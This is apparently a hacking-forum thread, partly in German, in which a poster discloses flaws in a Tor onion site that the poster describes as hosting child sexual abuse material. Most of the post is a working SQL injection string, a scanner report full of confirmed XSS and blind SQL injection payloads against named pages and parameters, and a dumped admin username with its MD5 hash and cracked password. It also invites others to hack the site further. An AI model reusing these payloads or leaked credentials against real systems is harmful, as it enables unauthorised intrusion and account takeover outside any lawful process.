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[Vuln] pedoartre6ookiff.onion

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Eine Antwort in diesem Thema

Dr. Spic

Dr. Spic


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SQLi: http://pedoartre6ookiff.onion/pages/video.php?id=' OR 'ns'='ns

Account password 'admin' was fortunately in one of my dictionaries, so I attach the report.
It is common MD5, they did not try to escape salt and other entries will follow.

username: blaatje123
role: admin
md5: 5416d7cd6ef195a0f7622a9c56b55e84
password: 1q2w3e4r

He would like some tips on the fault and totally dirty hack these web pages might follow.
Is there too much objectionable content, photos and videos are downright disgusting.
Activities of people who are busy with the creation of websites should be prosecuted in any country of the world.

report NetSparker <img src='http://www.toolbase.bz/board/public/style_emoticons/<#EMO_DIR#>/0007.png' class='bbc_emoticon' alt=':)' />

|||| - Boolean Based SQL Injection - ||||

Severity: Critical
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/pages/video.php?id=' OR 'ns'='ns
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

|||| - XSS (Cross-site Scripting) - ||||

Severity: Important
Confirmation: Confirmed
Vulnerable URL : http://pedoartre6ookiff.onion/index.php?'"--></style></script><script>alert(0x000062)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: Query Based
Parameter Type: FullQueryString
Attack Pattern: '"--></style></script><script>alert(0x000062)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/?'"--></style></script><script>alert(0x000064)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: Query Based
Parameter Type: FullQueryString
Attack Pattern: '"--></style></script><script>alert(0x000064)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x0000D7)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0000D7)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x0000D7)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0000D7)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x000317)</script>&cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000317)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/?=3&page='"--></style></script><script>alert(0x000339)</script>&cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000339)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/?cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3&page='"--></style></script><script>alert(0x0004CD)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0004CD)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/index.php?cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3&page='"--></style></script><script>alert(0x000586)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000586)</script>

|||| - Password Transmitted Over HTTP - ||||

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/login/login.php
Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
Form target action: ?action=login

|||| - PHP Version Disclosure - ||||

Severity: Low
Confirmation: Confirmed
Vulnerable URL : http://pedoartre6ookiff.onion/
Vulnerability Classifications: PCI 6.5.6 OWASP A6
Extracted Version: PHP/5.4.4-14+deb7u7

|||| - MySQL Database Identified - ||||

Severity: Information
Confirmation: Confirmed
Vulnerable URL : http://pedoartre6ookiff.onion/pages/video.php?id=-486'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: -486'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--

|||| - Cookie Not Marked As HttpOnly - ||||

Severity: Low
Confirmation: Confirmed
Vulnerable URL: http://pedoartre6ookiff.onion/
Vulnerability Classifications: OWASP A6 CWE-16
Identified Cookie: PHPSESSID





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Solche seiten gehoeren sogar aus dem darknet verbannt.

Whatever, die sqli ist aber jetzt nichts besonderes.

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D



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